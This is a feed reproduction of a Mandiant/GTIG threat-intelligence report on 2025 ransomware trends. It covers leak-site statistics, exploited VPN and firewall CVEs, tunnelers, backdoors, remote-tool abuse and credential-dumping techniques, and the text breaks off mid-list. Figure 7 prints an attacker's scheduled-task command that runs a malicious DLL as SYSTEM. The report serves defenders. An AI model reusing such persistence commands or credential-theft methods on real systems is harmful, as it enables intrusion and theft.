<title><![CDATA[Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape]]></title>
<description><![CDATA[Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark

Introduction 
Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive thr...]]></description>
<link>https://tsecurity.de/de/3501417/it-security-nachrichten/ransomware-under-pressure-tactics-techniques-and-procedures-in-a-shifting-threat-landscape/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501417/it-security-nachrichten/ransomware-under-pressure-tactics-techniques-and-procedures-in-a-shifting-threat-landscape/</guid>
<pubDate>Fri, 08 May 2026 23:19:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
<p><span>Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities, which is exemplified by the proliferation of the ransomware-as-a-service (RaaS) business model. While ransomware remains a dominant threat due to the volume of activity and the potential for serious operational disruptions, we have observed multiple indicators that suggest the overall profitability of ransomware operations is in decline. This trend is likely the result of multiple factors, including improved cybersecurity practices, increased ability of organizations to recover, and declining ransom payment amounts and rates. Further, numerous disruptions have impacted the ransomware ecosystem in recent years, from external forces like law enforcement operations to internal conflict between actors; both have led to the disappearance or significant debilitation of previously prolific RaaS groups like LockBit, ALPHV, Basta, and RansomHub. However, despite these shakeups, the well-established Qilin and Akira RaaS brands rose up to fill the vacuum, leading to a record high number of victims posted to data leak sites (DLS) in 2025 (Figure 1).</span></p>
<p><span>This report provides an overview of the ransomware landscape and common tactics, techniques, and procedures (TTPs) directly observed in the 2025 ransomware incidents that Mandiant Consulting responded to. In this analysis, we excluded activity focused only on data theft extortion. Key insights include: </span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>In a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>77 percent of analyzed ransomware intrusions included suspected data theft, a notable uptick from 57 percent of incidents in 2024.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>REDBIKE was the most frequently deployed ransomware family, accounting for 30 percent of analyzed ransomware incidents.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Several trends from prior years remained consistent, including a decreased use of certain intrusion tools like BEACON and MIMIKATZ and a plateau in the reliance of remote management tools.</span></p>
</li>
</ul>
<p><span>Google Threat Intelligence Group (GTIG) analysis of TTPs relies primarily on data from Mandiant engagements and therefore represents only a sample of global ransomware intrusion activity. These incidents involved the post-compromise deployment of ransomware following network intrusion activity, with the majority of incidents also involving data theft extortion. The impacted organizations were based across the Asia Pacific region, Europe, North America, and South America and within nearly every industry sector. </span></p>
<p><span>While we anticipate ransomware will remain one of the most impactful cyber threats in 2026, the reduction in profits may cause some threat actors to leverage other monetization methods and tactics, such as continuing targeting shifts, further increasing data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms. </span></p>
<p><span>Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span>Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment</span></a>.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig1.max-1000x1000.png" alt="Top 10 DLS in 2025 and associated ransomware families">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 1: Top 10 DLS in 2025 and associated ransomware families</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>2025 Ransomware Landscape </span></h3>
<p><span>In 2025, the ransomware landscape became increasingly crowded, with a record high number of unique DLS with at least one post. The growing pool of ransomware actors engaging in extortion operations combined with persistent targeted efforts by law enforcement and enhanced organizational security has likely shrunk profit margins for ransomware operators in recent years. In response, threat actors appear to be adopting new strategies from who they target to the technologies they use. This evolution has included an apparent increase in targeting smaller organizations, and a possible focus on data theft extortion without ransomware deployment. Furthermore, threat actors are incorporating artificial intelligence (AI) into aspects of their operations (e.g., negotiations) and leveraging Web3 technologies to bolster the resilience of their infrastructure. While we see expansions in these aspects, internal and external disruptions seen in recent years have prompted some threat actors to become more cautious resulting in more rigorous vetting of potential partners. We expect ransomware actors to continue to adjust and evolve their tactics in an attempt to maintain some level of success or regain the levels of profitability they reached historically.</span></p>
<p><span>2025 marked a record year for the number of posts on DLS, with the total number of posts surpassing that of 2024 by almost 50%. Despite these record setting numbers, we caution against relying solely on DLS data to ascertain the overall volume of ransomware activity. Threat actors typically only create DLS posts for victims that have refused to initiate or complete extortion negotiations. Public reporting </span><a href="https://www.coveware.com/blog/2026/2/3/mass-data-exfiltration-campaigns-lose-their-edge-in-q4-2025#payments" rel="noopener" target="_blank"><span>indicates</span></a><span> that ransom payment rates have been declining, which could, at least partially, fuel the steady increase of posts on shaming sites. It can also be difficult to differentiate between DLS posts associated with data theft-only operations and those that also include ransomware deployment. For example, threat actors associated with the CL0P DLS continue to occasionally deploy ransomware but have shifted primarily to data-theft-extortion-only operations. So while CL0P was the third most prolific DLS in 2025, the vast majority of incidents associated with these posts did not involve ransomware. We have also observed numerous instances of threat actors, such as those associated with BABUK 2.0, fabricating and exaggerating claims as well as reposting claims that would at least slightly inflate victim counts. Finally, not all claims are of equal significance. For example, between December 2024 and January 2025, FUNKSEC was the highest volume DLS; however, many of the associated incidents appeared to be lower impact events involving compromising websites for data theft extortion.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig2.max-1000x1000.png" alt="Volume of posts and unique data leak sites from 2020 through 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 2: Volume of posts and unique data leak sites from 2020 through 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Although ransomware has historically been highly lucrative, recent disruptions and enhanced organizational security may be impacting these profits. Public reporting indicates that both ransom payment rates and average ransom demands are decreasing. In February 2026, Coveware </span><a href="https://www.coveware.com/blog/2026/2/3/mass-data-exfiltration-campaigns-lose-their-edge-in-q4-2025" rel="noopener" target="_blank"><span>reported</span></a><span> that ransom payment rates have generally decreased over the past few years, reaching a historic low in Q4 2025. Similarly, in June 2025, Sophos </span><a href="https://assets.sophos.com/X24WTUEQ/at/9brgj5n44hqvgsp5f5bqcps/sophos-state-of-ransomware-2025.pdf" rel="noopener" target="_blank"><span>reported</span></a><span> that the average ransom demand has dropped by one-third during the last year, to $1.34 million in 2025 from $2 million in 2024. Public reporting further suggests that organizations that have been impacted by ransomware are able to recover more easily, which also likely contributes to reduced ransom payments. For example, in February 2025, Unit 42 </span><a href="https://www.paloaltonetworks.com/engage/unit42-2025-global-incident-response-report" rel="noopener" target="_blank"><span>reported</span></a><span> that companies have improved their ability to recover from ransomware incidents; nearly half of ransomware victims were able to restore from backup in 2024 compared to around 28% in 2023 and only 11% in 2022.</span></p>
<p><span>Improvements in organizational security and the growing ability of victims to recover from ransomware attacks may be leading some adversaries to view data theft as a more reliable method for securing payments. In intrusions investigated by Mandiant, we observed a decline in traditional ransomware deployment coinciding with a rise in data theft extortion. Further, some RaaS programs are providing data-theft-extortion-only options in addition to ransomware, which may reflect demand from their customer base. It is also plausible that more robust security posture, particularly at larger organizations, is forcing threat actors to adjust their targeting to focus on a higher volume of attacks targeting smaller organizations with less mature security programs. Analysis of organization size (based on estimated number of employees, when available) of victims posted on DLS indicates threat actors have shifted away from larger organizations and toward smaller organizations (Figure 3). Threat actors have directly commented on this trend. For example, in leaked April and May 2024 chats, a Basta actor theorized that targeting smaller company networks would be more effective compared to "normal networks."</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig3.max-1000x1000.png" alt="Percentage of DLS posts for victims with an estimated company size of less than 200 employees">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 3: Percentage of DLS posts for victims with an estimated company size of less than 200 employees</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>During 2025, numerous disruptive events impacted the ransomware ecosystem, including both a range of law enforcement and government actions as well as threat actor-related data leaks and disputes, at least some of which appear to be the result of turmoil amongst threat actors (Figure 4). Not only did many of these events result in direct disruption such as arrests, seizures, and sanctions, but some also forced threat actors to shift TTPs and provided valuable insights to security researchers on the inner workings and individuals behind some ransomware operations. Yet the dominance of long-standing Qilin and Akira brands in 2025 demonstrate the resilience of ransomware actors and their ability to fill voids following takedowns and exit scams of competing RaaS operators. There are some indications that the overall instability in the ransomware threat landscape, coupled with pressure from law enforcement, have caused ransomware teams to increase their operational security, which has translated into more rigorous vetting of potential affiliates. We've also seen some private or semi-private offerings gain prominence. For example, 2025 marked the first time in four years that one of the top two most prolific RaaS operations was not public; while Akira appears to have affiliates, they do not have a public advertisement for their operations.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig4.max-1000x1000.png" alt="Key disruptive events impacting the ransomware landscape">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 4: Key disruptive events impacting the ransomware landscape</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>In 2025, ransomware actors continued to evolve their operations by adopting emerging or established technologies to increase the efficiency and efficacy of their operations. Some threat actors are integrating Web3 technologies into their operations, likely as a way to make their infrastructure more resilient to takedown and detection efforts. The Cry0 RaaS claims to leverage Internet Computer Protocol (ICP) blockchain to host negotiation sites via decentralized canister smart contracts, enabling clearnet access without requiring TOR while DEADLOCK ransomware has leveraged Polygon smart contracts in order to store and rotate C2 infrastructure. We have also seen threat actors incorporating AI-features into their RaaS offerings: the GLOBAL RaaS reportedly has an AI-assisted chat that provides victim analysis and assists with communications, CHAOS purportedly includes a "built-in AI chatbot," although its specific use is unclear, while BERT allegedly uses AI-based data analysis to identify victim pressure points. Finally, we have observed twice the number of ransomware families that were capable of running on both Windows and Linux systems compared to 2024. This could suggest that threat actors are shifting toward cross-platform ransomware rather than creating multiple, separate variants to support their operations.</span></p>
<h3><span>Commonly Observed Tactics, Techniques, and Procedures</span></h3>
<p><span>The following sections discuss trends in the TTPs observed in post-compromise ransomware deployment incidents, organized into the corresponding stages of GTIG's attack lifecycle model (Figure 5). The TTPs outlined in this section were observed at Mandiant-led ransomware investigations during 2025.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig5.max-1000x1000.png" alt="Attack lifecycle associated with 2025 ransomware incidents">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 5: Attack lifecycle associated with 2025 ransomware incidents</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Initial Access</span></h4>
<p><span>During 2025, the most commonly identified initial access vector in ransomware incidents was the exploitation or suspected exploitation of vulnerabilities, accounting for a third of incidents, followed by web compromise, stolen credentials, and bruteforce attacks (Figure 6). Notably, while voice phishing was a commonly leveraged tactic in several high profile data theft extortion campaigns, it was not observed in ransomware incidents. This year we included suspected initial access vectors in our analysis to provide a more holistic view, given that some vectors can be more difficult to verify. For example, it can be difficult to confirm the use of stolen credentials, given that the credentials may have been harvested in a separate incident that occurred weeks prior or even on a personal device. Conversely, bruteforce attacks tend to generate many log entries that can be used to confirm the vector.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Throughout 2025 we observed ransomware operators leveraging a wide range of exploits for initial access (Table 1). While the majority of observed or suspected exploitation activity involved vulnerabilities disclosed prior to 2025, we observed multiple indicators that at least some ransomware actors were leveraging </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review"><span>zero-day exploits</span></a><span> in their operations.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In the majority of instances where exploits were used or suspected, the threat actors targeted vulnerabilities in common VPNs and firewalls such as Fortinet (CVE-2024-55591, CVE-2024-21762, and CVE-2019-6693), SonicWall (CVE-2024-40766), Palo Alto (CVE-2024-3400), and Citrix (CVE-2023-4966).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also observed malicious actors successfully exploit a variety of other exposed services, including Veritas Backup Exec, Zoho ManageEngine, Microsoft Sharepoint, and SAP Netweaver.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We observed evidence that multiple ransomware and/or data theft extortion operations leveraged zero-day vulnerabilities for initial access throughout the year.</span></p>
</li>
<ul>
<li aria-level="3">
<p role="presentation"><span>During mid-July 2025, an UNC6357 actor attempted to exploit Microsoft Sharepoint vulnerabilities CVE-2025-53770 and CVE-2025-53771 to gain access to the victim's environment and ultimately deploy LOCKBIT.WARLOCK. While this was observed after disclosure of the vulnerability, we observed evidence—including log data and public </span><a href="https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/" rel="noopener" target="_blank"><span>reporting</span></a><span>—suggesting the same actor attempted to exploit the same vulnerability as a zero-day.</span></p>
</li>
<li aria-level="3">
<p role="presentation"><span>In August 2025, GTIG assessed with high confidence that UNC2165 leveraged a zero-day exploit for CVE-2025-8088 to deploy MYTHICAGENT.</span></p>
</li>
<li aria-level="3">
<p role="presentation"><span>While the observed incidents did not involve ransomware deployment, threat actors associated with the CL0P DLS may have </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation"><span>exploited</span></a><span> CVE-2025-61882 as a zero-day against Oracle EBS environments. The CL0P DLS has been associated with multifaceted extortion operations involving CLOP ransomware; however, it is primarily associated with data theft extortion operations rather than ransomware deployment.</span></p>
</li>
</ul>
</ul>
<li aria-level="1">
<p role="presentation"><span>We observed multiple threat clusters leverage malvertising and/or search engine optimization (SEO) tactics to distribute malware payloads for initial access, including both ransomware operators themselves and initial access partners that ultimately led to follow-on ransomware intrusions. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed multiple UNC6016 malware distribution operations leverage malvertising to distribute malware payloads masquerading as legitimate software tools such as PuTTY to gain initial access. At least a portion of observed UNC6016 access operations ultimately lead to NITROGEN or RHYSIDA ransomware deployments.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>UNC2465 routinely leveraged malvertising and/or SEO techniques to distribute SMOKEDHAM payloads masquerading as RVTOOLs installers.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>While less frequent this year, many threat actors continued to rely on stolen credentials for initial access. In 21% of intrusions where the initial access vector was identified, the threat actor leveraged compromised legitimate credentials to access the victim environment, typically involving authentication to a victim's VPN or a Remote Desktop Protocol (RDP) login. While the source of stolen credentials cannot always be determined, actors can obtain them via numerous techniques including purchasing credentials from underground forums or using credentials exposed in infostealer logs.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We continued to see a subset of actors leveraging bruteforce attacks against victims' VPNs. In one incident involving ransomware that identified itself as Daixin, the threat actor conducted periodic bruteforce attacks against various VPN user accounts over the course of nearly a year before successfully gaining initial access.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We observed multiple intrusions where the ransomware operator gained access to the victim through an intermediary network. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed multiple disparate ransomware operations that leveraged network access to subsidiaries of victims to subsequently access the victim's network. In one instance the threat actor leveraged access to the subsidiary to bruteforce access to the victim's VPN.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In a separate incident, the threat actor leveraged a VPN connection owned by a third-party vendor to access an operational technology (OT) system within the victim's environment.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During one intrusion leading to CLOP ransomware deployment, UNC5833 gained access from an initial access partner who impersonated a helpdesk user to social engineer an employee via a Microsoft Teams chat session to install Quick Assist. While we observed limited use of social engineering by ransomware operators during 2025 in incidents we observed, it remained a popular technique among financially motivated intrusion actors more broadly.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig6.max-1000x1000.png" alt="Initial intrusion vectors">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 6: Initial intrusion vectors</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>Vendor</span></strong></p>
</td>
<td>
<p><strong><span>Product</span></strong></p>
</td>
<td>
<p><strong><span>CVE</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Fortinet</span></p>
</td>
<td>
<p><span>FortiOS / FortiProxy</span></p>
</td>
<td>
<p><span>CVE-2024-21762</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Veritas</span></p>
</td>
<td>
<p><span>Backup Exec</span></p>
</td>
<td>
<p><span>CVE-2021-27877</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Veritas</span></p>
</td>
<td>
<p><span>Backup Exec</span></p>
</td>
<td>
<p><span>CVE-2021-27878</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Zoho</span></p>
</td>
<td>
<p><span>ManageEngine ADSelfService Plus</span></p>
</td>
<td>
<p><span>CVE-2021-40539</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Fortinet</span></p>
</td>
<td>
<p><span>FortiOS / FortiProxy</span></p>
</td>
<td>
<p><span>CVE-2024-55591</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Fortinet</span></p>
</td>
<td>
<p><span>FortiOS</span></p>
</td>
<td>
<p><span>CVE-2019-6693</span></p>
</td>
</tr>
<tr>
<td>
<p><span>SonicWall</span></p>
</td>
<td>
<p><span>SonicOS</span></p>
</td>
<td>
<p><span>CVE-2024-40766</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Citrix</span></p>
</td>
<td>
<p><span>NetScaler</span></p>
</td>
<td>
<p><span>CVE-2023-4966</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Microsoft</span></p>
</td>
<td>
<p><span>SharePoint</span></p>
</td>
<td>
<p><span>CVE-2025-53771</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Microsoft</span></p>
</td>
<td>
<p><span>SharePoint</span></p>
</td>
<td>
<p><span>CVE-2025-53770</span></p>
</td>
</tr>
<tr>
<td>
<p><span>SAP</span></p>
</td>
<td>
<p><span>Netweaver</span></p>
</td>
<td>
<p><span>CVE-2025-31324</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Palo Alto</span></p>
</td>
<td>
<p><span>PAN-OS GlobalProtect</span></p>
</td>
<td>
<p><span>CVE-2024-3400</span></p>
</td>
</tr>
<tr>
<td>
<p><span>CrushFTP</span></p>
</td>
<td>
<p><span>CrushFTP</span></p>
</td>
<td>
<p><span>CVE-2025-31161</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<span>Table 1: <span>Vulnerabilities likely leveraged for initial access in 2025 ransomware incidents</span></span></div></div>
<div class="block-paragraph_advanced"><h4><span>Establish Foothold and Maintain Presence</span></h4>
<p><span>Once inside victim environments, threat actors engaged in many different techniques to establish a foothold and maintain presence, including leveraging valid credentials, tunnelers, backdoors, or legitimate remote access tools. Threat actors continued to use remote management tools to support both these phases of the attack lifecycle, albeit at slightly lower rates than 2024.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Ransomware actors consistently relied on compromised credentials to establish a foothold in victim environments. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Once authenticated to network services, they also often used these credentials to provision or modify highly privileged accounts to maintain access. For example, in a RIFTTEAR incident, the threat actor authenticated via Kerberos to a privileged system, provisioned an AD domain user, and added the account to a high-privileged group. We also saw multiple threat actors change passwords to root accounts on ESXi hosts.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In 2025, an increased number of threat actors adopted tunnelers to support these phases compared to 2024 observations. Observed tunnelers included publicly available offerings such as PYSOXY, CHISEL, CLOUDFLARED, RPIVOT, and REVSOCKS.CLIENT alongside seemingly private tunnelers like LIONSHARE, VIPERTUNNEL, and BLUNDERBLIGHT.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a LOCKBIT.WARLOCK incident, the exploitation of a Microsoft SharePoint vulnerability enabled remote code execution, granting the access required to install CLOUDFLARED from Github via the Windows msiexec command-line utility, establishing an outbound-only C2 channel.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>A subset of threat actors deployed backdoors—including CORNFLAKE.V3.JAVASCRIPT, SQUIDGATE, FIREHAWK, HAVOCDEMON, and SMOKEDHAM—to establish a foothold.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>UNC6021, a suspected FIN6 threat cluster, used SQUIDGATE's built-in functionality to deploy FIREHAWK, a toehold backdoor written in C. Consistent with FIN6 infections, a social engineering engagement on LinkedIn prompted a user to access a malicious website hosting a ZIP archive containing the BULLZLINK downloader. Once executed, it retrieved a dropper variant of SQUIDSLEEP with an embedded SQUIDGATE payload.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In 2025, multiple ransomware actors relied on remote monitoring and management tools (RMMs) for multiple phases of the attack lifecycle. We observed a variety of these legitimate tools abused in incidents, including ANYDESK, SCREENCONNECT, and SPLASHTOP (Table 2). </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In an UNC2465 incident, several weeks after the initial intrusion, the threat actors installed the TERAMIND RMM alongside Time Doctor. Time Doctor is an employee monitoring tool, which is capable of taking screenshots and screen recordings of the system as well as track website and application usage.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors continued to reduce their reliance on BEACON in ransomware operations; we observed BEACON in around 2% of intrusions, a decrease from an already diminished 11% in 2024. However, multiple threat clusters used other post-exploitation frameworks like AdaptixC2 (ADAPTAGENT), Exploration C2 (EXPLORATIONC2), or MYTHIC.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In an UNC2165 RANSOMHUB incident, the threat actors used COM hijacking as a persistence mechanism for MYTHIC. UNC2165 created MYTHIC in the "Temp" folder, renamed it to "msedge.dll," and modified the registry key for InprocServer32 to point to the MYTHIC payload.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors often used native Windows features to create services and register scheduled tasks to programmatically and recurrently execute malware, such as backdoors or tunnelers. For example, in a RHYSIDA incident, threat actors registered a scheduled task to run the LIONSHARE tunneler every 12 hours (Figure 7).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a TridentLocker-branded incident, the threat actors uploaded WAVECALL, a downloader implemented as a .NET assembly, to a victim server running CrushFTP. They modified the command-line instruction used for processing file previews, replacing the configured executable paths for ImageMagick and ExifTool utilities with the WAVECALL assembly, thereby executing it whenever a file preview operation was initiated. The actors later reverted this configuration and updated the command-line instruction to execute a Base64-encoded PowerShell script to deploy a follow-on payload.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/Create /SC MINUTE /MO 720 /TN Reg /TR "C:\Windows\System32\rundll32.exe C:\windows\system32\config\red.dll Test" /ru system</code></pre>
<p><span>Figure 7: Scheduled task for LIONSHARE</span></p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>ANYDESK</span></p>
</td>
<td>
<p><span>ATERA</span></p>
</td>
<td>
<p><span>CHROMEREMOTEDESKTOP</span></p>
</td>
</tr>
<tr>
<td>
<p><span>DAMEWARE</span></p>
</td>
<td>
<p><span>DWAGENT</span></p>
</td>
<td>
<p><span>MESHAGENT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>RUSTDESK</span></p>
</td>
<td>
<p><span>SCREENCONNECT</span></p>
</td>
<td>
<p><span>SPLASHTOP</span></p>
</td>
</tr>
<tr>
<td>
<p><span>TERAMIND</span></p>
</td>
<td> </td>
<td> </td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<span>Table 2: Legitimate remote access tools used to establish a foothold and maintain a presence</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Escalate Privileges</span></h4>
<p><span>Gaining access to highly privileged accounts is a critical step for ransomware actors as it enables further stages of the attack, such as disabling AV software, deleting backups, and deploying ransomware across the network. Threat actors continue to rely on a variety of privilege escalation tools and techniques, including leveraging MIMIKATZ, dumping credentials stored by the Windows operating system, and abusing Active Directory (AD).</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>We observed threat actors leverage MIMIKATZ in approximately 18% of ransomware intrusions in 2025, demonstrating a slight, but continued decline in its overall use in recent years dropping from use in 20% of all ransomware intrusions in 2024. Notably, we observed a decline in other publicly available privilege escalation and credential stealing tools as well; for example, we did not observe LAZAGNE in any ransomware intrusions in 2025, a reduction from 2% of intrusions in 2024, 4% in 2023, and 6% in 2022.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Consistent with recent years, throughout 2025 threat actors used a myriad of techniques to target Windows authentication systems to gain access to privileged accounts.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed threat actors frequently attempting to obtain credentials stored by Windows systems by dumping the Local Security Authority Subsystem Service (LSASS) process memory, copying the Active Directory domain database (NTDS.dit) file, and exporting the Security Account Manager (SAM), SYSTEM, and SECURITY registry hives.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Other observed methods include Kerberoasting, modifying the registry to enable WDigest credentials caching, and the recovery of credentials via the Windows Data Protection API (DPAPI).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Threat actors routinely elevated privileges of compromised and actor-provisioned accounts by adding them to local and domain administrator groups and/or granting the accounts additional privileges such as SeRemoteInteractiveLogonRight, SeDebugPrivilege, SeLoadDriverPrivilege, and SeBackupPrivilege.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In some intrusions, threat actors abused AD roles to obtain elevated privileges through a variety of means, including DCSync replication and the misuse of AD Certificate Services (AD CS). In a MEDUSALOCKER.V2 incident, the threat actors executed the "Move-ADDirectoryServerOperationMasterRole" cmdlet to transfer Flexible Single Master Operation (FSMO) roles from the victim's AD domain controller to a suspected rogue domain controller.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>We observed multiple threat actors attempt to harvest credentials from various internal sources, including backup tools, browsers, password managers, and credentials stored in cleartext.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In approximately 10% of intrusions we observed threat actors targeting Veeam Backup &amp; Replication for credential harvesting, which is consistent with activity observed in 2024. Multiple threat actors used the publicly available Veeam-Get-Creds.ps1 script or custom PowerShell scripts to obtain credentials stored in the Veeam configuration database.</span></p>
</li>
<li aria-level="2">
